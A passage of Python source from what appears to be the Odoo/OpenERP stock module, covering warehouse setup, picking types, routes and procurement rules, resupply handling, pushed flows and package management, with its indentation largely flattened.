#create the procurement rules
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#update receipt route and rules: unlink the existing rules of the warehouse receipt route and recreate it
pull_obj.unlink(cr, uid, [pu.id for pu in warehouse.reception_route_id.pull_ids], context=context)
push_obj.unlink(cr, uid, [pu.id for pu in warehouse.reception_route_id.push_ids], context=context)
route_name, values = routes_dict[new_reception_step]
route_obj.write(cr, uid, warehouse.reception_route_id.id, {'name': self._format_routename(cr, uid, warehouse, route_name, context=context)}, context=context)
push_rules_list, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, warehouse.reception_route_id.id, context=context)
#create the push/procurement rules
for push_rule in push_rules_list:
push_obj.create(cr, uid, vals=push_rule, context=context)
for pull_rule in pull_rules_list:
#all procurement rules in receipt route are mto, because we don't want to wait for the scheduler to trigger an orderpoint on input location
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
route_obj.write(cr, uid, warehouse.crossdock_route_id.id, {'active': new_reception_step != 'one_step' and new_delivery_step != 'ship_only'}, context=context)
#change MTO rule
dummy, values = routes_dict[new_delivery_step]
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, values, context=context)[0]
pull_obj.write(cr, uid, warehouse.mto_pull_id.id, mto_pull_vals, context=context)
return True
def create_sequences_and_picking_types(self, cr, uid, warehouse, context=None):
seq_obj = self.pool.get('ir.sequence')
picking_type_obj = self.pool.get('stock.picking.type')
#create new sequences
in_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence in'), 'prefix': warehouse.code + '/IN/', 'padding': 5}, context=context)
out_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence out'), 'prefix': warehouse.code + '/OUT/', 'padding': 5}, context=context)
pack_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence packing'), 'prefix': warehouse.code + '/PACK/', 'padding': 5}, context=context)
pick_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence picking'), 'prefix': warehouse.code + '/PICK/', 'padding': 5}, context=context)
int_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence internal'), 'prefix': warehouse.code + '/INT/', 'padding': 5}, context=context)
wh_stock_loc = warehouse.lot_stock_id
wh_input_stock_loc = warehouse.wh_input_stock_loc_id
wh_output_stock_loc = warehouse.wh_output_stock_loc_id
wh_pack_stock_loc = warehouse.wh_pack_stock_loc_id
#create in, out, internal picking types for warehouse
input_loc = wh_input_stock_loc
if warehouse.reception_steps == 'one_step':
input_loc = wh_stock_loc
output_loc = wh_output_stock_loc
if warehouse.delivery_steps == 'ship_only':
output_loc = wh_stock_loc
#choose the next available color for the picking types of this warehouse
color = 0
available_colors = [0, 3, 4, 5, 6, 7, 8, 1, 2] # put white color first
all_used_colors = self.pool.get('stock.picking.type').search_read(cr, uid, [('warehouse_id', '!=', False), ('color', '!=', False)], ['color'], order='color')
#don't use sets to preserve the list order
for x in all_used_colors:
if x['color'] in available_colors:
available_colors.remove(x['color'])
if available_colors:
color = available_colors[0]
        #order the picking types with a sequence allowing to have the following order for each warehouse: reception, internal, pick, pack, ship.
max_sequence = self.pool.get('stock.picking.type').search_read(cr, uid, [], ['sequence'], order='sequence desc')
max_sequence = max_sequence and max_sequence[0]['sequence'] or 0
internal_active_false = (warehouse.reception_steps == 'one_step') and (warehouse.delivery_steps == 'ship_only')
internal_active_false = internal_active_false and not self.user_has_groups(cr, uid, 'stock.group_locations')
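        # i.e. the Internal Transfers picking type is hidden when the warehouse uses single-step
        # reception and ship-only delivery and the user does not manage multiple stock locations.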
in_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Receipts'),
'warehouse_id': warehouse.id,
'code': 'incoming',
'use_create_lots': True,
'use_existing_lots': False,
'sequence_id': in_seq_id,
'default_location_src_id': False,
'default_location_dest_id': input_loc.id,
'sequence': max_sequence + 1,
'color': color}, context=context)
out_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Delivery Orders'),
'warehouse_id': warehouse.id,
'code': 'outgoing',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': out_seq_id,
'return_picking_type_id': in_type_id,
'default_location_src_id': output_loc.id,
'default_location_dest_id': False,
'sequence': max_sequence + 4,
'color': color}, context=context)
picking_type_obj.write(cr, uid, [in_type_id], {'return_picking_type_id': out_type_id}, context=context)
int_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Internal Transfers'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': int_seq_id,
'default_location_src_id': wh_stock_loc.id,
'default_location_dest_id': wh_stock_loc.id,
'active': not internal_active_false,
'sequence': max_sequence + 2,
'color': color}, context=context)
pack_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Pack'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': pack_seq_id,
'default_location_src_id': wh_pack_stock_loc.id,
'default_location_dest_id': output_loc.id,
'active': warehouse.delivery_steps == 'pick_pack_ship',
'sequence': max_sequence + 3,
'color': color}, context=context)
pick_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Pick'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': pick_seq_id,
'default_location_src_id': wh_stock_loc.id,
'default_location_dest_id': output_loc.id if warehouse.delivery_steps == 'pick_ship' else wh_pack_stock_loc.id,
'active': warehouse.delivery_steps != 'ship_only',
'sequence': max_sequence + 2,
'color': color}, context=context)
#write picking types on WH
vals = {
'in_type_id': in_type_id,
'out_type_id': out_type_id,
'pack_type_id': pack_type_id,
'pick_type_id': pick_type_id,
'int_type_id': int_type_id,
}
super(stock_warehouse, self).write(cr, uid, warehouse.id, vals=vals, context=context)
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
if vals is None:
vals = {}
data_obj = self.pool.get('ir.model.data')
seq_obj = self.pool.get('ir.sequence')
picking_type_obj = self.pool.get('stock.picking.type')
location_obj = self.pool.get('stock.location')
#create view location for warehouse
loc_vals = {
'name': _(vals.get('code')),
'usage': 'view',
'location_id': data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_locations')[1],
}
if vals.get('company_id'):
loc_vals['company_id'] = vals.get('company_id')
wh_loc_id = location_obj.create(cr, uid, loc_vals, context=context)
vals['view_location_id'] = wh_loc_id
#create all location
def_values = self.default_get(cr, uid, ['reception_steps', 'delivery_steps'])
reception_steps = vals.get('reception_steps', def_values['reception_steps'])
delivery_steps = vals.get('delivery_steps', def_values['delivery_steps'])
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
sub_locations = [
{'name': _('Stock'), 'active': True, 'field': 'lot_stock_id'},
{'name': _('Input'), 'active': reception_steps != 'one_step', 'field': 'wh_input_stock_loc_id'},
{'name': _('Quality Control'), 'active': reception_steps == 'three_steps', 'field': 'wh_qc_stock_loc_id'},
{'name': _('Output'), 'active': delivery_steps != 'ship_only', 'field': 'wh_output_stock_loc_id'},
{'name': _('Packing Zone'), 'active': delivery_steps == 'pick_pack_ship', 'field': 'wh_pack_stock_loc_id'},
]
for values in sub_locations:
loc_vals = {
'name': values['name'],
'usage': 'internal',
'location_id': wh_loc_id,
'active': values['active'],
}
if vals.get('company_id'):
loc_vals['company_id'] = vals.get('company_id')
location_id = location_obj.create(cr, uid, loc_vals, context=context_with_inactive)
vals[values['field']] = location_id
#create WH
new_id = super(stock_warehouse, self).create(cr, uid, vals=vals, context=context)
warehouse = self.browse(cr, uid, new_id, context=context)
self.create_sequences_and_picking_types(cr, uid, warehouse, context=context)
#create routes and push/procurement rules
new_objects_dict = self.create_routes(cr, uid, new_id, warehouse, context=context)
self.write(cr, uid, warehouse.id, new_objects_dict, context=context)
# If partner assigned
if vals.get('partner_id'):
comp_obj = self.pool['res.company']
if vals.get('company_id'):
transit_loc = comp_obj.browse(cr, uid, vals.get('company_id'), context=context).internal_transit_location_id.id
else:
transit_loc = comp_obj.browse(cr, uid, comp_obj._company_default_get(cr, uid, 'stock.warehouse', context=context)).internal_transit_location_id.id
self.pool['res.partner'].write(cr, uid, [vals['partner_id']], {'property_stock_customer': transit_loc,
'property_stock_supplier': transit_loc}, context=context)
return new_id
def _format_rulename(self, cr, uid, obj, from_loc, dest_loc, context=None):
return obj.code + ': ' + from_loc.name + ' -> ' + dest_loc.name
def _format_routename(self, cr, uid, obj, name, context=None):
return obj.name + ': ' + name
def get_routes_dict(self, cr, uid, ids, warehouse, context=None):
#fetch customer and supplier locations, for references
customer_loc, supplier_loc = self._get_partner_locations(cr, uid, ids, context=context)
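#each entry maps a reception/delivery configuration to (route name, list of (from_location, dest_location, picking_type_id) tuples) used to build the corresponding rules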
return {
'one_step': (_('Receipt in 1 step'), []),
'two_steps': (_('Receipt in 2 steps'), [(warehouse.wh_input_stock_loc_id, warehouse.lot_stock_id, warehouse.int_type_id.id)]),
'three_steps': (_('Receipt in 3 steps'), [(warehouse.wh_input_stock_loc_id, warehouse.wh_qc_stock_loc_id, warehouse.int_type_id.id), (warehouse.wh_qc_stock_loc_id, warehouse.lot_stock_id, warehouse.int_type_id.id)]),
'crossdock': (_('Cross-Dock'), [(warehouse.wh_input_stock_loc_id, warehouse.wh_output_stock_loc_id, warehouse.int_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
'ship_only': (_('Ship Only'), [(warehouse.lot_stock_id, customer_loc, warehouse.out_type_id.id)]),
'pick_ship': (_('Pick + Ship'), [(warehouse.lot_stock_id, warehouse.wh_output_stock_loc_id, warehouse.pick_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
'pick_pack_ship': (_('Pick + Pack + Ship'), [(warehouse.lot_stock_id, warehouse.wh_pack_stock_loc_id, warehouse.pick_type_id.id), (warehouse.wh_pack_stock_loc_id, warehouse.wh_output_stock_loc_id, warehouse.pack_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
}
def _handle_renaming(self, cr, uid, warehouse, name, code, context=None):
location_obj = self.pool.get('stock.location')
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
#rename location
location_id = warehouse.lot_stock_id.location_id.id
location_obj.write(cr, uid, location_id, {'name': code}, context=context)
#rename route and push-procurement rules
for route in warehouse.route_ids:
route_obj.write(cr, uid, route.id, {'name': route.name.replace(warehouse.name, name, 1)}, context=context)
for pull in route.pull_ids:
pull_obj.write(cr, uid, pull.id, {'name': pull.name.replace(warehouse.name, name, 1)}, context=context)
for push in route.push_ids:
push_obj.write(cr, uid, push.id, {'name': push.name.replace(warehouse.name, name, 1)}, context=context)
#change the mto procurement rule name
if warehouse.mto_pull_id.id:
pull_obj.write(cr, uid, warehouse.mto_pull_id.id, {'name': warehouse.mto_pull_id.name.replace(warehouse.name, name, 1)}, context=context)
def _check_delivery_resupply(self, cr, uid, warehouse, new_location, change_to_multiple, context=None):
""" Will check if the resupply routes from this warehouse follow the changes of number of delivery steps """
#Check routes that are being delivered by this warehouse and change the rule going to transit location
route_obj = self.pool.get("stock.location.route")
pull_obj = self.pool.get("procurement.rule")
routes = route_obj.search(cr, uid, [('supplier_wh_id','=', warehouse.id)], context=context)
pulls = pull_obj.search(cr, uid, ['&', ('route_id', 'in', routes), ('location_id.usage', '=', 'transit')], context=context)
if pulls:
pull_obj.write(cr, uid, pulls, {'location_src_id': new_location, 'procure_method': change_to_multiple and "make_to_order" or "make_to_stock"}, context=context)
# Create or clean MTO rules
mto_route_id = self._get_mto_route(cr, uid, context=context)
if not change_to_multiple:
# If single delivery we should create the necessary MTO rules for the resupply
# pulls = pull_obj.search(cr, uid, ['&', ('route_id', '=', mto_route_id), ('location_id.usage', '=', 'transit'), ('location_src_id', '=', warehouse.lot_stock_id.id)], context=context)
pull_recs = pull_obj.browse(cr, uid, pulls, context=context)
transfer_locs = list(set([x.location_id for x in pull_recs]))
vals = [(warehouse.lot_stock_id, x, warehouse.out_type_id.id) for x in transfer_locs]
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, vals, context=context)
for mto_pull_val in mto_pull_vals:
pull_obj.create(cr, uid, mto_pull_val, context=context)
else:
# We need to delete all the MTO procurement rules, otherwise they risk to be used in the system
pulls = pull_obj.search(cr, uid, ['&', ('route_id', '=', mto_route_id), ('location_id.usage', '=', 'transit'), ('location_src_id', '=', warehouse.lot_stock_id.id)], context=context)
if pulls:
pull_obj.unlink(cr, uid, pulls, context=context)
def _check_reception_resupply(self, cr, uid, warehouse, new_location, context=None):
"""
Will check if the resupply routes to this warehouse follow the changes of number of receipt steps
"""
#Check routes that are being delivered by this warehouse and change the rule coming from transit location
route_obj = self.pool.get("stock.location.route")
pull_obj = self.pool.get("procurement.rule")
routes = route_obj.search(cr, uid, [('supplied_wh_id','=', warehouse.id)], context=context)
pulls = pull_obj.search(cr, uid, ['&', ('route_id', 'in', routes), ('location_src_id.usage', '=', 'transit')], context=context)
if pulls:
pull_obj.write(cr, uid, pulls, {'location_id': new_location}, context=context)
def _check_resupply(self, cr, uid, warehouse, reception_new, delivery_new, context=None):
if reception_new:
old_val = warehouse.reception_steps
new_val = reception_new
change_to_one = (old_val != 'one_step' and new_val == 'one_step')
change_to_multiple = (old_val == 'one_step' and new_val != 'one_step')
if change_to_one or change_to_multiple:
new_location = change_to_one and warehouse.lot_stock_id.id or warehouse.wh_input_stock_loc_id.id
self._check_reception_resupply(cr, uid, warehouse, new_location, context=context)
if delivery_new:
old_val = warehouse.delivery_steps
new_val = delivery_new
change_to_one = (old_val != 'ship_only' and new_val == 'ship_only')
change_to_multiple = (old_val == 'ship_only' and new_val != 'ship_only')
if change_to_one or change_to_multiple:
new_location = change_to_one and warehouse.lot_stock_id.id or warehouse.wh_output_stock_loc_id.id
self._check_delivery_resupply(cr, uid, warehouse, new_location, change_to_multiple, context=context)
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
seq_obj = self.pool.get('ir.sequence')
route_obj = self.pool.get('stock.location.route')
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
for warehouse in self.browse(cr, uid, ids, context=context_with_inactive):
#first of all, check if we need to delete and recreate route
if vals.get('reception_steps') or vals.get('delivery_steps'):
#activate and deactivate location according to reception and delivery option
self.switch_location(cr, uid, warehouse.id, warehouse, vals.get('reception_steps', False), vals.get('delivery_steps', False), context=context)
# switch between route
self.change_route(cr, uid, ids, warehouse, vals.get('reception_steps', False), vals.get('delivery_steps', False), context=context_with_inactive)
# Check if we need to change something to resupply warehouses and associated MTO rules
self._check_resupply(cr, uid, warehouse, vals.get('reception_steps'), vals.get('delivery_steps'), context=context)
if vals.get('code') or vals.get('name'):
name = warehouse.name
#rename sequence
if vals.get('name'):
name = vals.get('name', warehouse.name)
self._handle_renaming(cr, uid, warehouse, name, vals.get('code', warehouse.code), context=context_with_inactive)
if warehouse.in_type_id:
seq_obj.write(cr, uid, warehouse.in_type_id.sequence_id.id, {'name': name + _(' Sequence in'), 'prefix': vals.get('code', warehouse.code) + '/IN/'}, context=context)
if warehouse.out_type_id:
seq_obj.write(cr, uid, warehouse.out_type_id.sequence_id.id, {'name': name + _(' Sequence out'), 'prefix': vals.get('code', warehouse.code) + '/OUT/'}, context=context)
if warehouse.pack_type_id:
seq_obj.write(cr, uid, warehouse.pack_type_id.sequence_id.id, {'name': name + _(' Sequence packing'), 'prefix': vals.get('code', warehouse.code) + '/PACK/'}, context=context)
if warehouse.pick_type_id:
seq_obj.write(cr, uid, warehouse.pick_type_id.sequence_id.id, {'name': name + _(' Sequence picking'), 'prefix': vals.get('code', warehouse.code) + '/PICK/'}, context=context)
if warehouse.int_type_id:
seq_obj.write(cr, uid, warehouse.int_type_id.sequence_id.id, {'name': name + _(' Sequence internal'), 'prefix': vals.get('code', warehouse.code) + '/INT/'}, context=context)
if vals.get('resupply_wh_ids') and not vals.get('resupply_route_ids'):
for cmd in vals.get('resupply_wh_ids'):
if cmd[0] == 6:
new_ids = set(cmd[2])
old_ids = set([wh.id for wh in warehouse.resupply_wh_ids])
to_add_wh_ids = new_ids - old_ids
if to_add_wh_ids:
supplier_warehouses = self.browse(cr, uid, list(to_add_wh_ids), context=context)
self._create_resupply_routes(cr, uid, warehouse, supplier_warehouses, warehouse.default_resupply_wh_id, context=context)
to_remove_wh_ids = old_ids - new_ids
if to_remove_wh_ids:
to_remove_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', 'in', list(to_remove_wh_ids))], context=context)
if to_remove_route_ids:
route_obj.unlink(cr, uid, to_remove_route_ids, context=context)
else:
#not implemented
pass
if 'default_resupply_wh_id' in vals:
if vals.get('default_resupply_wh_id') == warehouse.id:
raise UserError(_('The default resupply warehouse should be different than the warehouse itself!'))
if warehouse.default_resupply_wh_id:
#remove the existing resupplying route on the warehouse
to_remove_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', '=', warehouse.default_resupply_wh_id.id)], context=context)
for inter_wh_route_id in to_remove_route_ids:
self.write(cr, uid, [warehouse.id], {'route_ids': [(3, inter_wh_route_id)]})
if vals.get('default_resupply_wh_id'):
#assign the new resupplying route on all products
to_assign_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', '=', vals.get('default_resupply_wh_id'))], context=context)
for inter_wh_route_id in to_assign_route_ids:
self.write(cr, uid, [warehouse.id], {'route_ids': [(4, inter_wh_route_id)]})
# If another partner assigned
if vals.get('partner_id'):
if not vals.get('company_id'):
company = self.browse(cr, uid, ids[0], context=context).company_id
else:
company = self.pool['res.company'].browse(cr, uid, vals['company_id'])
transit_loc = company.internal_transit_location_id.id
self.pool['res.partner'].write(cr, uid, [vals['partner_id']], {'property_stock_customer': transit_loc,
'property_stock_supplier': transit_loc}, context=context)
return super(stock_warehouse, self).write(cr, uid, ids, vals=vals, context=context)
def get_all_routes_for_wh(self, cr, uid, warehouse, context=None):
route_obj = self.pool.get("stock.location.route")
all_routes = [route.id for route in warehouse.route_ids]
all_routes += route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id)], context=context)
all_routes += [warehouse.mto_pull_id.route_id.id]
return all_routes
def view_all_routes_for_wh(self, cr, uid, ids, context=None):
all_routes = []
for wh in self.browse(cr, uid, ids, context=context):
all_routes += self.get_all_routes_for_wh(cr, uid, wh, context=context)
domain = [('id', 'in', all_routes)]
return {
'name': _('Warehouse\'s Routes'),
'domain': domain,
'res_model': 'stock.location.route',
'type': 'ir.actions.act_window',
'view_id': False,
'view_mode': 'tree,form',
'view_type': 'form',
'limit': 20
}
class stock_location_path(osv.osv):
_name = "stock.location.path"
_description = "Pushed Flows"
_order = "name"
def _get_rules(self, cr, uid, ids, context=None):
res = []
for route in self.browse(cr, uid, ids, context=context):
res += [x.id for x in route.push_ids]
return res
_columns = {
'name': fields.char('Operation Name', required=True),
'company_id': fields.many2one('res.company', 'Company'),
'route_id': fields.many2one('stock.location.route', 'Route'),
'location_from_id': fields.many2one('stock.location', 'Source Location', ondelete='cascade', select=1, required=True,
help="This rule can be applied when a move is confirmed that has this location as destination location"),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', ondelete='cascade', select=1, required=True,
help="The new location where the goods need to go"),
'delay': fields.integer('Delay (days)', help="Number of days needed to transfer the goods"),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type', required=True,
help="This is the picking type that will be put on the stock moves"),
'auto': fields.selection(
[('auto','Automatic Move'), ('manual','Manual Operation'),('transparent','Automatic No Step Added')],
'Automatic Move',
required=True, select=1,
help="The 'Automatic Move' / 'Manual Operation' value will create a stock move after the current one. " \
"With 'Automatic No Step Added', the location is replaced in the original move."
),
'propagate': fields.boolean('Propagate cancel and split', help='If checked, when the previous move is cancelled or split, the move generated by this move will too'),
'active': fields.boolean('Active'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse'),
'route_sequence': fields.related('route_id', 'sequence', string='Route Sequence',
store={
'stock.location.route': (_get_rules, ['sequence'], 10),
'stock.location.path': (lambda self, cr, uid, ids, c={}: ids, ['route_id'], 10),
}),
'sequence': fields.integer('Sequence'),
}
_defaults = {
'auto': 'auto',
'delay': 0,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'procurement.order', context=c),
'propagate': True,
'active': True,
}
def _prepare_push_apply(self, cr, uid, rule, move, context=None):
newdate = (datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta.relativedelta(days=rule.delay or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {
'origin': move.origin or move.picking_id.name or "/",
'location_id': move.location_dest_id.id,
'location_dest_id': rule.location_dest_id.id,
'date': newdate,
'company_id': rule.company_id and rule.company_id.id or False,
'date_expected': newdate,
'picking_id': False,
'picking_type_id': rule.picking_type_id and rule.picking_type_id.id or False,
'propagate': rule.propagate,
'push_rule_id': rule.id,
'warehouse_id': rule.warehouse_id and rule.warehouse_id.id or False,
'procurement_id': False,
}
def _apply(self, cr, uid, rule, move, context=None):
move_obj = self.pool.get('stock.move')
newdate = (datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta.relativedelta(days=rule.delay or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
if rule.auto == 'transparent':
old_dest_location = move.location_dest_id.id
move_obj.write(cr, uid, [move.id], {
'date': newdate,
'date_expected': newdate,
'location_dest_id': rule.location_dest_id.id
})
#avoid looping if a push rule is not well configured
if rule.location_dest_id.id != old_dest_location:
#call again push_apply to see if a next step is defined
move_obj._push_apply(cr, uid, [move], context=context)
else:
vals = self._prepare_push_apply(cr, uid, rule, move, context=context)
move_id = move_obj.copy(cr, uid, move.id, vals, context=context)
move_obj.write(cr, uid, [move.id], {
'move_dest_id': move_id,
})
move_obj.action_confirm(cr, uid, [move_id], context=None)
# -------------------------
# Packaging related stuff
# -------------------------
from openerp.report import report_sxw
class stock_package(osv.osv):
"""
These are the packages, containing quants and/or other packages
"""
_name = "stock.quant.package"
_description = "Physical Packages"
_parent_name = "parent_id"
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
def name_get(self, cr, uid, ids, context=None):
res = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
return res.items()
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = m.name
parent = m.parent_id
while parent:
res[m.id] = parent.name + ' / ' + res[m.id]
parent = parent.parent_id
return res
def _get_packages(self, cr, uid, ids, context=None):
"""Returns packages from quants for store"""
res = set()
for quant in self.browse(cr, uid, ids, context=context):
pack = quant.package_id
while pack:
res.add(pack.id)
pack = pack.parent_id
return list(res)
def _get_package_info(self, cr, uid, ids, name, args, context=None):
quant_obj = self.pool.get("stock.quant")
default_company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
res = dict((res_id, {'location_id': False, 'company_id': default_company_id, 'owner_id': False}) for res_id in ids)
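#the package location, owner and company are taken from the first quant found inside the package (sub-packages included)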
for pack in self.browse(cr, uid, ids, context=context):
quants = quant_obj.search(cr, uid, [('package_id', 'child_of', pack.id)], context=context)
if quants:
quant = quant_obj.browse(cr, uid, quants[0], context=context)
res[pack.id]['location_id'] = quant.location_id.id
res[pack.id]['owner_id'] = quant.owner_id.id
res[pack.id]['company_id'] = quant.company_id.id
else:
res[pack.id]['location_id'] = False
res[pack.id]['owner_id'] = False
res[pack.id]['company_id'] = False
return res
def _get_packages_to_relocate(self, cr, uid, ids, context=None):
res = set()
for pack in self.browse(cr, uid, ids, context=context):
res.add(pack.id)
if pack.parent_id:
res.add(pack.parent_id.id)
return list(res)
_columns = {
'name': fields.char('Package Reference', select=True, copy=False),
'complete_name': fields.function(_complete_name, type='char', string="Package Name",),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'packaging_id': fields.many2one('product.packaging', 'Packaging', help="This field should be completed only if everything inside the package shares the same product, otherwise it doesn't really make sense.", select=True),
'location_id': fields.function(_get_package_info, type='many2one', relation='stock.location', string='Location', multi="package",
store={
'stock.quant': (_get_packages, ['location_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
'quant_ids': fields.one2many('stock.quant', 'package_id', 'Bulk Content', readonly=True),
'parent_id': fields.many2one('stock.quant.package', 'Parent Package', help="The package containing this item", ondelete='restrict', readonly=True),
'children_ids': fields.one2many('stock.quant.package', 'parent_id', 'Contained Packages', readonly=True),
'company_id': fields.function(_get_package_info, type="many2one", relation='res.company', string='Company', multi="package",
store={
'stock.quant': (_get_packages, ['company_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
'owner_id': fields.function(_get_package_info, type='many2one', relation='res.partner', string='Owner', multi="package",
store={
'stock.quant': (_get_packages, ['owner_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
}
_defaults = {
'name': lambda self, cr, uid, context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'stock.quant.package') or _('Unknown Pack')
}
def _check_location_constraint(self, cr, uid, packs, context=None):
'''checks that all quants in a package are stored in the same location. This function cannot be used
as a constraint because it needs to be checked on pack operations (they may not call write on the
package)
'''
quant_obj = self.pool.get('stock.quant')
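#walk up to the top-level package and check that every quant it contains (directly or in sub-packages) shares the same location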
for pack in packs:
parent = pack
while parent.parent_id:
parent = parent.parent_id
quant_ids = self.get_content(cr, uid, [parent.id], context=context)
quants = [x for x in quant_obj.browse(cr, uid, quant_ids, context=context) if x.qty > 0]
location_id = quants and quants[0].location_id.id or False
if not all(quant.location_id.id == location_id for quant in quants):
raise UserError(_('Everything inside a package should be in the same location'))
return True
def action_print(self, cr, uid, ids, context=None):
context = dict(context or {}, active_ids=ids)
return self.pool.get("report").get_action(cr, uid, ids, 'stock.report_package_barcode_small', context=context)
def unpack(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for package in self.browse(cr, uid, ids, context=context):
quant_ids = [quant.id for quant in package.quant_ids]
quant_obj.write(cr, SUPERUSER_ID, quant_ids, {'package_id': package.parent_id.id or False}, context=context)
children_package_ids = [child_package.id for child_package in package.children_ids]
self.write(cr, uid, children_package_ids, {'parent_id': package.parent_id.id or False}, context=context)
return self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'stock', 'action_package_view', context=context)
def get_content(self, cr, uid, ids, context=None):
child_package_ids = self.search(cr, uid, [('id', 'child_of', ids)], context=context)
return self.pool.get('stock.quant').search(cr, uid, [('package_id', 'in', child_package_ids)], context=context)
def get_content_package(self, cr, uid, ids, context=None):
quants_ids = self.get_content(cr, uid, ids, context=context)
res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'stock', 'quantsact', context=context)
res['domain'] = [('id', 'in', quants_ids)]
return res
def _get_product_total_qty(self, cr, uid, package_record, product_id, context=None):
''' Find the total quantity of the given product 'product_id' inside the given package 'package_record'. '''
quant_obj = self.pool.get('stock.quant')
all_quant_ids = self.get_content(cr, uid, [package_record.id], context=context)
total = 0
for quant in quant_obj.browse(cr, uid, all_quant_ids, context=context):
if quant.product_id.id == product_id:
total += quant.qty
return total
def _get_all_products_quantities(self, cr, uid, package_id, context=None):
'''This function computes the different product quantities for the given package
'''
quant_obj = self.pool.get('stock.quant')
res = {}
for quant in quant_obj.browse(cr, uid, self.get_content(cr, uid, package_id, context=context)):
if quant.product_id not in res:
res[quant.product_id] = 0
res[quant.product_id] += quant.qty
return res
#Remove me?
def copy_pack(self, cr, uid, id, default_pack_values=None, default=None, context=None):
stock_pack_operation_obj = self.pool.get('stock.pack.operation')
if default is None:
default = {}
new_package_id = self.copy(cr, uid, id, default_pack_values, context=context)
default['result_package_id'] = new_package_id
op_ids = stock_pack_operation_obj.search(cr, uid, [('result_package_id', '=', id)], context=context)
for op_id in op_ids:
stock_pack_operation_obj.copy(cr, uid, op_id, default, context=context)
class stock_pack_operation(osv.osv):
_name = "stock.pack.operation"
_description = "Packing Operation"
_order = "result_package_id desc, id"
def _get_remaining_prod_quantities(self, cr, uid, operation, context=None):
'''Get the remaining quantities per product on an operation with a package. This function returns a dictionary'''
#if the operation doesn't concern a package, it's not relevant to call this function
if not operation.package_id or operation.product_id:
return {operation.product_id: operation.remaining_qty}
#get the total of products the package contains
res = self.pool.get('stock.quant.package')._get_all_products_quantities(cr, uid, operation.package_id.id, context=context)
#reduce by the quantities linked to a move
for record in operation.linked_move_operation_ids:
if record.move_id.product_id.id not in res:
res[record.move_id.product_id] = 0
res[record.move_id.product_id] -= record.qty
return res
def _get_remaining_qty(self, cr, uid, ids, name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = {}
for ops in self.browse(cr, uid, ids, context=context):
res[ops.id] = 0
if ops.package_id and not ops.product_id:
#don't try to compute the remaining quantity for packages because it's not relevant (a package could include different products).
#should use _get_remaining_prod_quantities instead
continue
else:
qty = ops.product_qty
if ops.product_uom_id:
qty = uom_obj._compute_qty_obj(cr, uid, ops.product_uom_id, ops.product_qty, ops.product_id.uom_id, context=context)
for record in ops.linked_move_operation_ids:
qty -= record.qty
